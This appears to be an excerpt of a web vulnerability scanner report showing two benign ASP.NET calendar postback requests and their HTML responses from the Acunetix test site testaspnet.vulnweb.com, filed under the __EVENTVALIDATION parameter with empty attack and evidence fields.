Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8493&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAO17WM9sIZGRkMzlkg5gNo4ym%2BKlOSYbrbF7nqoo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0lo7CDwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweuvAXITrhaVPm%2BFPklRNUJxRgrLg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:35 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAO17WM9sIZGRkMzlkg5gNo4ym+KlOSYbrbF7nqoo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0lo7CDwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweuvAXITrhaVPm+FPklRNUJxRgrLg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:White" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8247&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAnJyHctoIZGRk7Bi%2BqajZhXjzVFO97%2BLMq4otuo8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0oaytAgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DFPpmO%2Bm4uwO9isHpETARFXDfMTo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:47 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAnJyHctoIZGRk7Bi+qajZhXjzVFO97+LMq4otuo8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0oaytAgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DFPpmO+m4uwO9isHpETARFXDfMTo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:White" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
